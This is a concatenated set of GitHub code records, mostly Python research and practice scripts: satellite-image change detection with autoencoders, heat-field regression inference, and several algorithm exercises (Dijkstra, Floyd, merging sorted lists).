main()","repo_name":"tuna0724/Pruning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"69925350949","text":"\"\"\"\nRuns a model on a single node across multiple gpus.\n\"\"\"\nimport os\nfrom pathlib import Path\n\nimport torch\nimport numpy as np\nimport torch.nn.functional as F\nimport scipy.io as sio\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom matplotlib.font_manager import findfont, FontProperties\nimport configargparse\nimport matplotlib.font_manager as fm\n\nfrom src.DeepRegression import Model\nfrom src.mcqr.mcqr_regression import MC_QR_prediction_for_regression\n\n\ndef main(hparams):\n\n my_font = fm.FontProperties(fname=\"/mnt/zhengxiaohu/times/times.ttf\")\n\n if hparams.gpu == 0:\n device = torch.device(\"cpu\")\n else:\n ngpu = \"cuda:\"+str(hparams.gpu-1)\n print(ngpu)\n device = torch.device(ngpu)\n model = 
Model(hparams).to(device)\n\n    # print(hparams)\n    # print()\n\n    # Model loading\n    model_path = os.path.join(f'lightning_logs/version_' +\n                              hparams.test_check_num, 'checkpoints/')\n    ckpt = list(Path(model_path).glob(\"*.ckpt\"))[0]\n    # print(ckpt)\n\n    model = model.load_from_checkpoint(str(ckpt))\n\n    model.eval()\n    model.to(device)\n    mae_test = []\n\n    # Testing Set\n    root = hparams.data_root\n    test_list = hparams.test_list\n    file_path = os.path.join(root, test_list)\n    root_dir = os.path.join(root, 'test', 'test')\n\n    if not os.path.exists(f'./outputs/mcs_pre_003'):\n        os.mkdir(f'./outputs/mcs_pre_003')\n    with open(file_path, 'r') as fp:\n        i = 23000\n        for line in fp.readlines():\n            print(i)\n            # Data Reading\n            data_path = line.strip()\n            path = os.path.join(root_dir, data_path)\n            data = sio.loadmat(path)\n            u_obs = data[\"u_obs\"]\n            u_obs = torch.Tensor(u_obs)\n\n            u_obs = ((u_obs - hparams.mean_layout) / hparams.std_layout).unsqueeze(0).unsqueeze(0)\n            zeros = torch.zeros_like(u_obs)\n            u_obs = torch.where(u_obs<0, zeros, u_obs)\n            u_obs = u_obs.to(device)\n            \n            with torch.no_grad():\n                heat_pre, std= MC_QR_prediction_for_regression(500, u_obs, model, tau='all')\n            \n            heat_pre = heat_pre.squeeze(0).cpu().numpy() * hparams.std_heat + hparams.mean_heat\n            std = std.squeeze(0).cpu().numpy()* hparams.std_heat\n            \n            data_dir = '/mnt/zhengxiaohu/PIRL/outputs/mcs_pre_003/'\n            file_name = f'mcs_{i}.mat'\n            i += 1\n            \n            u_obs_0 = u_obs.squeeze(0).squeeze(0).cpu()\n            u_obs_298 = u_obs_0 * hparams.std_heat + hparams.mean_heat\n            u_obs = torch.where(u_obs_298==298, u_obs_0, u_obs_298).numpy()\n            path = data_dir + file_name\n            data = {\"u_pre\": heat_pre, \n                    \"std\": std}\n            sio.savemat(path, data)\n\n\n","repo_name":"Xiaohu-Zheng/Physics-informed-Deep-MC-QR","sub_path":"src/mcs_pre.py","file_name":"mcs_pre.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"71053132071","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[35]:\n\n\n# Simple linear equation solver.\n# ax+b = c\ndef solve1(a, b, c):\n    return (c-b)/a\n\n# 2x+1 = 5\nprint('2x+1=5, x=', solve1(2,1,5))\n\n# (10+j5)x+5=20\nprint('(10+j5)x+5 = 20, x=', solve1(10+5j,5,20))\n\n\n# In[36]:\n\n\nimport matplotlib.pyplot as plt\n\n# Set of complex points.\nS = {2+2j, 3+2j, 1.75+1j, 2+1j, 2.25+1j,\n     2.5+1j, 2.75+1j, 3+1j, 3.25+1j}\n\nreals = [z.real for z in S]\nimags = [z.imag for z in S]\n\n# Plot points by using pyplot.\nplt.title('Complex points')\nplt.xlabel('Real')\nplt.ylabel('Imaginary')\nplt.xlim([0, 6])\nplt.ylim([0, 6])\nplt.plot(reals, imags, '.')\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"guhwanbae/GuLA","sub_path":"field/complex-field/complex_class.py","file_name":"complex_class.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"25366801428","text":"\n\nimport os\n\nparent_folder = \"D:/Data/kg_core/real/\"\n\n# Create a list to store the organized information\norganized_data = []\n\n# Traverse through the subfolders\nfor subfolder in os.listdir(parent_folder):\n    subfolder_path = os.path.join(parent_folder, subfolder)\n\n    # Check if the path is a directory\n    if os.path.isdir(subfolder_path):\n\n        # Traverse through the files in the subfolder\n        for file_name in os.listdir(subfolder_path):\n            file_path = os.path.join(subfolder_path, file_name)\n\n            # Check if the file contains \"core.dat\" in its name\n            if \"core.dat\" in file_name:\n\n                # Extract the 
first and second integers from the file name\n first_integer, second_integer = file_name.split(\"_\")[:2]\n\n # Read the number of nodes and running time from the file\n with open(file_path, \"r\") as file:\n number_of_nodes = file.readline().strip()\n running_time = file.readline().strip()\n\n # Determine the Type based on the values of first_integer and second_integer\n if first_integer == \"3\":\n # Set Type as 1 for k=3\n organized_data.append(\n [subfolder, first_integer, second_integer, number_of_nodes, running_time, \"Type 1\"])\n else:\n # Set Type as 2 for varying k\n organized_data.append(\n [subfolder, first_integer, second_integer, number_of_nodes, running_time, \"Type 2\"])\n\n # Add an additional entry with Type 2 for the case 3, 3\n if first_integer == \"3\" and second_integer == \"3\":\n organized_data.append(\n [subfolder, first_integer, second_integer, number_of_nodes, running_time, \"Type 2\"])\n\n# Print the organized information\nfor data in organized_data:\n print(\"\\t\".join(data))\n","repo_name":"dahee-e/kgcore","sub_path":"result_organize.py","file_name":"result_organize.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34005878996","text":"# odd_or_even_without_%_operator\n# Method 1 : Using Brute Force\n# This method simply checks if the given input integer is divisible by 2 or not. If it’s divisible then print Even or Odd otherwise.\nnum=int(input('enter the num: '))\nif num % 2 == 0: \n print(\"Given number is Even\") \nelse: \n print(\"Given number is Odd\")\n\n\n# Method 2 : Using Ternary Operator\n# This Method uses the ternary operator to check if the integer input is divisible by 2, If true print Even or Odd otherwise.\nprint(\"Even\") if num%2 == 0 else print(\"Odd\")\n\n\n# Method 3 : Using Bitwise Operator\n# This Method uses bitwise operators to check if a given number is Even or Odd.\ndef odd_or_even(n):\n if n&1==1:\n return f'{n} is odd number'\n return f'{n} is even number'\nprint(odd_or_even(19))\n\n","repo_name":"PTHARRISH/Python-Notes","sub_path":"codes/2.odd_or_even.py","file_name":"2.odd_or_even.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"70943164069","text":"import os, time, re, datetime\nimport numpy as np\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\n\nfrom osgeo import gdal, ogr\nfrom codes.image_processing import extend, open_tiff, create_tiff\n\nfrom codes.imgtotensor_patches_samples_two import ImageDataset\nfrom codes.loader import dsloader\nfrom codes.check_gpu import on_gpu\nfrom random import sample\nfrom codes.otsu_avg import otsu\n\n\ndef create_dir(dir_name):\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\ngpu = on_gpu() # We check if we can work on GPU, GPU RAM should be >4Gb\nprint (\"ON GPU is \"+str(gpu))\n\n\nstart_time = time.time()\nrun_name = str(time.strftime(\".%Y-%m-%d_%H%M\"))\nprint (run_name)\n\n\n\n# Here we choose the type of the output of the encoding model\n# If there is no pooling, we get one output variable (encoded features)\n# If there is pooling, we get two outputs (encoded features and pooling indicies)\nlist_types_of_return = [\"no_pooling\", \"pooling\"]\n\n\n#Parameters\ntype_of_return = list_types_of_return[0]\npatch_size = 7\nbands_to_keep = 3\nepoch_nb = 1\nbatch_size = 150\nlearning_rate = 0.00005\nsampleTrue = False\nmaskTrue = True # if we 
 apply mask to compute changes for particular areas\nsatellite = \"S2\"\ncity_name = \"Rostov\"\n\n\n\n# Here we give the parameters of the pre-trained model, so we will fine-tune it later\nreference_model = \"2019-11-12_1705\" # model run time\nepoch_model = 3 # epoch we want to use\nloss_model = 2.29e-05 # loss value of this epoch\npath_models = os.path.expanduser('~/Desktop/Results/RESULTS_CHANGE_DETECTION/NN_Rostov_S2_all_images_model_pretrained/') # global path for the results for the chosen dataset\nfolder_pretrained_results = \"All_images_ep_3_patch_7.2019-11-12_1705/\" # folder with all the results for the chosen model\n\n\n# Path to the dataset with images\n# path_datasets = os.path.expanduser('~/Desktop/Datasets/Montpellier_SPOT5_Clipped_relatively_normalized_03_02_mask_vegetation_water_mode_parts_2004_no_DOS1_/')\npath_datasets = os.path.expanduser('~/Desktop/Datasets/Rostov_S2_Concatenated_Clipped_norm_without_2016_filtered/')\n\nif maskTrue:\n    path_mask = os.path.expanduser('~/Desktop/Datasets/Rostov_S2_Defected_clipped/')\n\nmodel_folder = folder_pretrained_results + \"model.\"+reference_model\n\n\n# We open extended images to calculate the min and max of the dataset to normalize the image values from 0 to 1\nimages_list = np.sort(os.listdir(path_datasets))\npath_list = []\nlist_image_extended = []\nlist_image_date = []\nnew_images_list = []\nif maskTrue:\n    list_image_extended_temp = []\n    list_image_mask = []\nfor image_name_with_extention in images_list:\n    # if image_name_with_extention.endswith(\".TIF\") and image_name_with_extention.startswith(\n    #         city_name) and not image_name_with_extention.endswith(\"band.TIF\"):\n    if image_name_with_extention.endswith(\".TIF\") and not image_name_with_extention.endswith(\"band.TIF\"):\n        new_images_list.append(image_name_with_extention)\n        img_path = path_datasets + image_name_with_extention\n        path_list.append(img_path)\n        image_array, H, W, geo, proj, bands_nb = open_tiff(path_datasets,\n                                                           os.path.splitext(image_name_with_extention)[0])\n        if satellite == \"SPOT5\":\n            image_date = (re.search(\"XS_([0-9]*)_\", image_name_with_extention)).group(1)\n        if satellite == \"S2\":\n            image_date = (re.search(\"S2_([0-9]*).\", image_name_with_extention)).group(1)\n        print (image_date)\n        if bands_to_keep == 3:\n            if satellite == \"SPOT5\":\n                image_array = np.delete(image_array, 3, axis=0)\n                bands_nb = 3\n            if satellite == \"S2\":\n                image_array = np.delete(image_array, 0, axis=0)\n                bands_nb = 3\n        if satellite == \"S2\":\n            for b in range(len(image_array)):\n                image_array[b][image_array[b] > 4096] = np.max(image_array[b][image_array[b] <= 4096])\n        if maskTrue:\n            # in our case we have only one mask for the whole SITS, but in case you have separate masks for each couple of images, it can be useful\n            path_mask = \"/media/user/DATA/Results/Segmentation_new_outliers_filled/\"\n            mask_name = \"Water_city_mask\"\n            mask_array, _, _, _, _, _ = open_tiff(path_mask, mask_name)\n            mask_array[mask_array > 0] = 10\n            image_array_mask = mask_array\n            list_image_mask.append(mask_array)\n        image_extended = extend(image_array, patch_size)\n        list_image_extended.append(image_extended)\n        list_image_date.append(image_date)\nlist_image_date = np.asarray(list_image_date, dtype=int)\nsort_ind = np.argsort(list_image_date) # we arrange images by date of acquisition\nlist_image_extended = np.asarray(list_image_extended, dtype=float)[sort_ind]\nnbr_images = len(list_image_extended)\nlist_image_date = np.asarray(list_image_date, dtype=str)\nnew_images_list = 
np.asarray(new_images_list)[sort_ind]\nif maskTrue:\n    list_image_mask = np.asarray(list_image_mask)[sort_ind]\n\n\n\n# We calculate min and max of dataset to perform image rescaling from 0 to 1 later\nlist_norm = []\nfor band in range(len(list_image_extended[0])):\n    all_images_band = list_image_extended[:, band, :, :].flatten()\n    min = np.min(all_images_band)\n    max = np.max(all_images_band)\n    list_norm.append([min, max])\n\n\n\nfor im in range(0, len(list_image_extended)-1):\n    # We open the pre-trained AE model for every couple of images\n    try:\n        ae_model_name = \"ae-model_ep_\" + str(epoch_model) + \"_loss_\" + str(loss_model) + \".\" + reference_model\n        encoder12, decoder12 = torch.load(path_models + model_folder + \"/\" + ae_model_name + \".pkl\")\n        encoder21, decoder21 = torch.load(path_models + model_folder + \"/\" + ae_model_name + \".pkl\")\n    except:\n        encoder_model_name = \"encoder-model_ep_\" + str(epoch_model) + \"_loss_\" + str(loss_model) + \".\" + reference_model\n        decoder_model_name = \"decoder-model_ep_\" + str(epoch_model) + \"_loss_\" + str(loss_model) + \".\" + reference_model\n        encoder12 = torch.load(path_models + model_folder + \"/\" + encoder_model_name + \".pkl\")\n        decoder12 = torch.load(path_models + model_folder + \"/\" + decoder_model_name + \".pkl\")\n        encoder21 = torch.load(path_models + model_folder + \"/\" + encoder_model_name + \".pkl\")\n        decoder21 = torch.load(path_models + model_folder + \"/\" + decoder_model_name + \".pkl\")\n\n    if gpu:\n        encoder12 = encoder12.cuda()  # On GPU\n        decoder12 = decoder12.cuda()  # On GPU\n        encoder21 = encoder21.cuda()  # On GPU\n        decoder21 = decoder21.cuda()  # On GPU\n\n\n    # Here we have to choose the images timestamps (whether it is t and t+1 or t and t+2)\n    image_name1 = os.path.splitext(new_images_list[im])[0]\n    image_date1 = list_image_date[im]\n\n    image_name2 = os.path.splitext(new_images_list[im+1])[0]\n    image_date2 = list_image_date[im+1]\n\n    print(image_date1, image_date2)\n\n\n    folder_results = folder_pretrained_results +\"t_t1/\" + \"Joint_AE_\"+image_date1 + \"_\" +image_date2 + \"_ep_\" + str(epoch_nb) + \"_patch_\" + str(patch_size) + run_name\n    path_results = os.path.expanduser('~/Desktop/Results/RESULTS_CHANGE_DETECTION/NN_'+city_name+'_'+str(satellite)+'_all_images_model_pretrained/') + folder_results +\"/\"\n\n\n    # we check if these changes are already computed\n    if os.path.exists(path_results):\n        continue\n\n\n    create_dir(path_results)\n\n    path_model = path_results + 'model'+run_name+\"/\" #we will save the encoder/decoder models here\n    create_dir(path_model)\n\n\n    driver_tiff = gdal.GetDriverByName(\"GTiff\")\n    driver_shp = ogr.GetDriverByName(\"ESRI Shapefile\")\n\n\n    image_array1, H, W, geo, proj, bands_nb = open_tiff(path_datasets, image_name1)\n    image_array2, H, W, geo, proj, bands_nb = open_tiff(path_datasets, image_name2)\n    if bands_to_keep == 3:\n        if satellite == \"SPOT5\":\n            image_array1 = np.delete(image_array1, 3, axis=0)\n            image_array2 = np.delete(image_array2, 3, axis=0)\n            bands_nb = 3\n        if satellite == \"S2\":\n            image_array1 = np.delete(image_array1, 0, axis=0)\n            image_array2 = np.delete(image_array2, 0, axis=0)\n            bands_nb = 3\n    if satellite == \"S2\":\n        for b in range(len(image_array1)):\n            image_array1[b][image_array1[b]>4096] = np.max(image_array1[b][image_array1[b]<=4096])\n            image_array2[b][image_array2[b]>4096] = np.max(image_array2[b][image_array2[b]<=4096])\n\n\n\n    image_extended1 = extend(image_array1, patch_size).astype(float)\n    image_extended2 = extend(image_array2, patch_size).astype(float)\n\n\n\n    for band in range(len(image_extended1)):\n        image_extended1[band] = 
(image_extended1[band] - list_norm[band][0])/(list_norm[band][1]-list_norm[band][0])\n        image_extended2[band] = (image_extended2[band] - list_norm[band][0])/(list_norm[band][1]-list_norm[band][0])\n\n    if sampleTrue:\n        nbr_patches_per_image = int(H * W / 2)\n        samples_list = np.sort(sample(range(H * W), nbr_patches_per_image))\n        image = ImageDataset(image_extended1, image_extended2, patch_size,\n                             samples_list)  # we create a dataset with tensor patches\n        loader = dsloader(image, gpu, batch_size=batch_size, shuffle=True)\n\n    elif maskTrue:\n        mask = np.where((list_image_mask[im] + list_image_mask[im+1]).flatten() == 0)[0]\n        image = ImageDataset(image_extended1, image_extended2, patch_size,\n                             mask)  # we create a dataset with tensor patches\n        loader = dsloader(image, gpu, batch_size, shuffle=True)\n\n    else:\n        image = ImageDataset(image_extended1, image_extended2, patch_size,\n                             list(range(H * W)))  # we create a dataset with tensor patches\n        loader = dsloader(image, gpu, batch_size=batch_size, shuffle=True)\n\n    image_enc = ImageDataset(image_extended1, image_extended2, patch_size,\n                             list(range(H * W)))  # we create a dataset with tensor patches\n\n\n    #we save everything to stats file\n    with open(path_results+\"stats.txt\", 'a') as f:\n        f.write(\"Relu activations for every layer except the last one. The last one is not activated\" + \"\\n\")\n        f.write(\"patch_size=\" + str(patch_size) + \"\\n\")\n        f.write(\"epoch_nb=\" + str(epoch_nb) + \"\\n\")\n        f.write(\"batch_size=\" + str(batch_size) + \"\\n\")\n        f.write(\"learning_rate=\" + str(learning_rate) + \"\\n\")\n        f.write(\"sample=\" + str(sampleTrue) + \"\\n\")\n        f.close()\n\n\n    optimizer = torch.optim.Adam((list(encoder12.parameters()) + list(decoder12.parameters()) + list(encoder21.parameters()) + list(decoder21.parameters())), lr=learning_rate)\n    criterion = nn.MSELoss() #loss function\n\n    with open(path_results+\"stats.txt\", 'a') as f:\n        f.write(str(encoder12) + \"\\n\")\n        f.close()\n\n    start_time = time.time()\n\n\n    # function to fine-tune the model\n    epoch_loss_list = []\n    epoch_loss12_list = []\n    epoch_loss21_list = []\n    def train(epoch):\n        # we have separate encoder/decoder models for both AE\n        encoder12.train() #we switch to train mode (by default)\n        decoder12.train()\n        encoder21.train() #we switch to train mode (by default)\n        decoder21.train()\n        total_loss = 0\n        total_loss12 = 0\n        total_loss21 = 0\n        for batch_idx, (data1, data2, _) in enumerate(loader): #we load batches from the loader\n            if gpu:\n                data1 = data1.cuda()\n                data2 = data2.cuda()\n            # if/else allows us to manipulate different types of models with different input/output\n            if type_of_return == list_types_of_return[0]:\n                encoded12 = encoder12(Variable(data1))\n                encoded21 = encoder21(Variable(data2))\n                decoded12 = decoder12(encoded12)\n                decoded21 = decoder21(encoded21)\n            if type_of_return == list_types_of_return[1]:\n                encoded12, id1 = encoder12(Variable(data1))\n                decoded12 = decoder12(encoded12, id1)\n                encoded21, id1 = encoder21(Variable(data2))\n                decoded21 = decoder21(encoded21, id1)\n            encoded21_copy = encoded21.clone().detach()\n            encoded12_copy = encoded12.clone().detach()\n\n            loss11 = criterion(encoded12, (encoded12_copy+encoded21_copy)/2)\n            loss22 = criterion(encoded21, (encoded12_copy+encoded21_copy)/2)\n            total_loss += loss11.item() #total loss for the epoch\n            loss12 = criterion(decoded12, Variable(data2))\n            total_loss12 += loss12.item()\n            loss21 = criterion(decoded21, Variable(data1))\n            total_loss21 += loss21.item()\n            optimizer.zero_grad() #everything to optimize the model\n            
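# retain_graph=True keeps the shared computation graph alive so the remaining backward() calls can reuse it\n            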
loss11.backward(retain_graph=True)\n            loss22.backward(retain_graph=True)\n            loss12.backward(retain_graph=True)\n            loss21.backward()\n            optimizer.step()\n            if (batch_idx+1) % 200 == 0:\n                print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.7f}\\tLoss12: {:.7f}\\tLoss21: {:.7f}'.format(\n                    (epoch+1), (batch_idx+1) * batch_size, len(loader.dataset),\n                    100. * (batch_idx+1) / len(loader), loss11.item(), loss12.item(), loss21.item()))\n        epoch_loss = total_loss / len(loader) #avg loss per epoch\n        epoch_loss_list.append(epoch_loss)\n        epoch_loss12 = total_loss12 / len(loader) #avg loss per epoch\n        epoch_loss12_list.append(epoch_loss12)\n        epoch_loss21 = total_loss21 / len(loader) #avg loss per epoch\n        epoch_loss21_list.append(epoch_loss21)\n        epoch_stats = \"Epoch {} Complete: Avg. Loss: {:.7f}\\tAvg. Loss12: {:.7f}\\tAvg. Loss21: {:.7f}\".format(epoch + 1, epoch_loss, epoch_loss12, epoch_loss21)\n        print(epoch_stats)\n        with open(path_results + \"stats.txt\", 'a') as f:\n            f.write(epoch_stats+\"\\n\")\n            f.close()\n\n        #we save all the models to choose the best afterwards\n        torch.save([encoder12, decoder12], (path_model+'ae12-model_ep_'+str(epoch+1)+\"_loss_\"+str(round(epoch_loss12, 7))+run_name+'.pkl') )\n        torch.save([encoder21, decoder21], (path_model+'ae21-model_ep_'+str(epoch+1)+\"_loss_\"+str(round(epoch_loss21, 7))+run_name+'.pkl') )\n\n\n    for epoch in range(epoch_nb):\n        if epoch==3:\n            learning_rate = 0.00005\n            optimizer = torch.optim.Adam((list(encoder12.parameters()) + list(decoder12.parameters()) + list(encoder21.parameters()) + list(decoder21.parameters())), lr=learning_rate)\n\n            with open(path_results + \"stats.txt\", 'a') as f:\n                f.write(\"new_learning_rate=\" + str(learning_rate) + \"\\n\")\n                f.close()\n        train(epoch)\n\n\n    # we compute fine-tuning time\n    end_time = time.time()\n    total_time_learning = end_time - start_time\n    total_time_learning = str(datetime.timedelta(seconds=total_time_learning))\n    print(\"Total time fine-tuning =\", total_time_learning)\n\n    with open(path_results+\"stats.txt\", 'a') as f:\n        f.write(\"Total time fine-tuning =\" + str(total_time_learning) + \"\\n\"+\"\\n\")\n        f.close()\n\n    # we perform feature translation and compute the reconstruction loss to detect the change areas\n    # we create data loader for the fine-tuning\n    loader = dsloader(image_enc, gpu, batch_size=2000, shuffle=False)\n\n    criterion = nn.MSELoss(reduce=False)\n\n    for best_epoch in range(1, epoch_nb+1):\n        # we choose the best epoch for reconstruction (in the article we fine-tune for only one epoch, so it does not change anything in this particular case)\n        best_epoch_loss12 = epoch_loss12_list[best_epoch-1]\n        best_epoch_loss21 = epoch_loss21_list[best_epoch-1]\n        # we load this model\n        best_encoder12, best_decoder12 = torch.load(path_model + 'ae12-model_ep_' + str(best_epoch) + \"_loss_\" + str(round(best_epoch_loss12, 7)) + run_name + '.pkl')\n        best_encoder21, best_decoder21 = torch.load(path_model + 'ae21-model_ep_' + str(best_epoch) + \"_loss_\" + str(round(best_epoch_loss21, 7)) + run_name + '.pkl')\n\n        if gpu:\n            best_encoder12 = best_encoder12.cuda()  # On GPU\n            best_encoder21 = best_encoder21.cuda()  # On GPU\n            best_decoder12 = best_decoder12.cuda()  # On GPU\n            best_decoder21 = best_decoder21.cuda()  # On GPU\n\n        name_results12 = \"From_\" + image_date1 + \"_to_\" + image_date2 + \"_ep_\" + str(best_epoch)\n        name_results21 = \"From_\" + image_date2 + \"_to_\" + image_date1 + \"_ep_\" + str(best_epoch)\n\n\n        new_coordinates_loss_mean12 = []\n        new_coordinates_loss_mean21 = []\n\n        best_encoder12.eval()\n        
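# keep all four networks in evaluation mode for the reconstruction pass\n        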
best_decoder12.eval()\n        best_encoder21.eval()\n        best_decoder21.eval()\n        for batch_idx, (data1, data2, _) in enumerate(loader):  # we load batches from the loader\n            if gpu:\n                data1 = data1.cuda()\n                data2 = data2.cuda()\n                #index = index.cuda(async=True)\n            if type_of_return == list_types_of_return[0]:\n                encoded12 = best_encoder12(Variable(data1))\n                decoded12 = best_decoder12(encoded12)\n                encoded21 = best_encoder21(Variable(data2))\n                decoded21 = best_decoder21(encoded21)\n            if type_of_return == list_types_of_return[1]:\n                encoded12, id1 = best_encoder12(Variable(data1))\n                decoded12 = best_decoder12(encoded12, id1)\n                encoded21, id1 = best_encoder21(Variable(data2))\n                decoded21 = best_decoder21(encoded21, id1)\n\n            loss12 = criterion(decoded12, Variable(data2))\n            loss21 = criterion(decoded21, Variable(data1))\n\n            loss_mean12 = loss12.view(-1, bands_nb, patch_size*patch_size).mean(2).mean(1)\n            loss_mean21 = loss21.view(-1, bands_nb, patch_size*patch_size).mean(2).mean(1)\n\n            if gpu:\n                new_coordinates_loss_batch_mean12 = loss_mean12.data.cpu().numpy()\n                new_coordinates_batch12 = decoded12.data.cpu().numpy()\n                new_coordinates_loss_batch_mean21 = loss_mean21.data.cpu().numpy()\n                new_coordinates_batch21 = decoded21.data.cpu().numpy()\n            else:\n                new_coordinates_loss_batch_mean12 = loss_mean12.data.numpy()\n                new_coordinates_batch12 = decoded12.data.numpy()\n                new_coordinates_loss_batch_mean21 = loss_mean21.data.numpy()\n                new_coordinates_batch21 = decoded21.data.numpy()\n\n\n            new_coordinates_loss_mean12.append(list(new_coordinates_loss_batch_mean12))\n            new_coordinates_loss_mean21.append(list(new_coordinates_loss_batch_mean21))\n\n            if (batch_idx + 1) % 200 == 0:\n                print('Encoding : [{}/{} ({:.0f}%)]'.format(\n                    (batch_idx + 1) * batch_size, len(loader.dataset),\n                    100. * (batch_idx + 1) / len(loader)))\n\n        print(len(new_coordinates_loss_mean12))\n        new_coordinates_loss_mean12 = np.asarray(new_coordinates_loss_mean12).flatten()\n        new_coordinates_loss_mean21 = np.asarray(new_coordinates_loss_mean21).flatten()\n\n        if maskTrue:\n            defected_mask = np.setdiff1d(np.arange(H*W), mask)\n            new_coordinates_loss_mean12[defected_mask] = 0\n            new_coordinates_loss_mean21[defected_mask] = 0\n        else:\n            defected_mask = None\n            mask = None\n\n        # We create a loss image in new coordinate system\n        image_array_tr_mean = np.reshape(new_coordinates_loss_mean12, (H, W))\n        loss_image_name_mean = name_results12\n        loss_image_mean = path_results + \"Loss_mean_\" + loss_image_name_mean + \".TIF\"\n        dst_ds = create_tiff(1, loss_image_mean, W, H, gdal.GDT_Float32, image_array_tr_mean, geo, proj)\n        dst_ds = None\n        image_array_loss1 = image_array_tr_mean\n\n\n        # We create a loss image in new coordinate system\n        image_array_tr_mean = np.reshape(new_coordinates_loss_mean21, (H, W))\n        loss_image_name_mean = name_results21\n        loss_image_mean = path_results + \"Loss_mean_\" + loss_image_name_mean + \".TIF\"\n        dst_ds = create_tiff(1, loss_image_mean, W, H, gdal.GDT_Float32, image_array_tr_mean, geo, proj)\n        dst_ds = None\n        image_array_loss2 = image_array_tr_mean\n\n        # we compute otsu thresholding for 2 different threshold parameters 0.995 and 0.998\n        # the parameter \"changes\" is used only when we have a GT change map for this couple of images and we want to compute accuracy statistics\n        otsu(image_array_loss1, image_array_loss2, H, W, geo, proj, path_results, image_date1 + \"_to_\" + image_date2, threshold=0.995, changes=None, mask=mask)\n        otsu(image_array_loss1, image_array_loss2, H, W, geo, proj, path_results, image_date1 + \"_to_\" + image_date2, 
threshold=0.998, changes=None, mask=mask)","repo_name":"ekalinicheva/Unsupervised-CD-in-SITS-using-DL-and-Graphs","sub_path":"Bitemporal_change_detection/main_finetuning.py","file_name":"main_finetuning.py","file_ext":"py","file_size_in_byte":20877,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"71"} +{"seq_id":"13392710369","text":"# https://www.codechef.com/problems/XORAND\nimport math\nfor _ in range(int(input())):\n n=int(input())\n a=list(map(int,input().split()))\n count=[0]*31\n for x in a:\n count[int(math.log2(x))]+=1\n ans=0\n for x in count:\n ans+=int((x*x-x)/2) \n print(ans) ","repo_name":"abhik2003/my_cp","sub_path":"XORAND.py","file_name":"XORAND.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34835687508","text":"from heapq import heappush, heappop\ndef Floyd(graph, x, k):\n for i in range(1, len(graph)):\n for a in range(1,len(graph)):\n for b in range(1,len(graph)):\n graph[a][b]=min(graph[a][b], graph[a][i]+graph[i][b])\n graph[b][a]=min(graph[a][b], graph[a][i]+graph[i][b])\n\n return graph[1][k]+graph[k][x] if graph[1][k]+graph[k][x] < int(1e9) else -1\n\ndef dijkstra(graph, x):\n q=[]\n distance=[int(1e9)]*len(graph)\n distance[x]=0\n heappush(q,(0,x))\n while q:\n dist_of_vertex, vertex=heappop(q)\n if dist_of_vertex > distance[vertex]: continue\n for adj in graph[vertex]:\n cost=distance[vertex]+1\n if cost < distance[adj]:\n distance[adj]=cost\n heappush(q, (cost, adj))\n return distance\n\ndef dijstra_solution(graph, x, k):\n dijk_from_start=dijkstra(graph,1)\n dijk_from_k=dijkstra(graph,k)\n return dijk_from_start[k]+dijk_from_k[x] if dijk_from_start[k]+dijk_from_k[x] < int(1e9) else -1\n\nif __name__==\"__main__\":\n v, e = map(int, input().split())\n graph=[[int(1e9)]*(v+1) for _ in range(v+1)]\n dijkgraph=[[] for _ in range((v+1))]\n\n for i in range(v+1): graph[i][i]=0\n for i in range(e):\n a,b=map(int, input().split())\n graph[a][b]=1\n graph[b][a]=1\n\n dijkgraph[a].append(b)\n dijkgraph[b].append(a)\n\n x, k = map(int, input().split())\n print(Floyd(graph,x,k))\n print(dijstra_solution(dijkgraph, x, k))","repo_name":"yunhacho/SelfStudy","sub_path":"Algorithm/이것이코딩테스트다/최단경로/미래도시.py","file_name":"미래도시.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30312331549","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeKLists(self, lists: List[Optional[ListNode]]) -> Optional[ListNode]:\n if lists is None or len(lists) == 0:\n return None\n\n while len(lists) > 1:\n merged = []\n for i in range(0, len(lists), 2):\n l1 = lists[i]\n l2 = lists[i+1] if (i+1) < len(lists) else None\n merged.append(self.merge2Lists(l1, l2))\n lists = merged\n return lists[0]\n\n def merge2Lists(self, l1, l2):\n head = dummy = ListNode()\n while l1 and l2:\n if l1.val <= l2.val:\n head.next = l1\n l1 = l1.next\n else:\n head.next = l2\n l2 = l2.next\n head = head.next\n\n if l1:\n head.next = l1\n else:\n head.next = l2\n\n return dummy.next\n","repo_name":"lucasnbsb/Data-Structures-and-Algorithms","sub_path":"problems/3 hard/23. Merge k Sorted Lists.py","file_name":"23. 
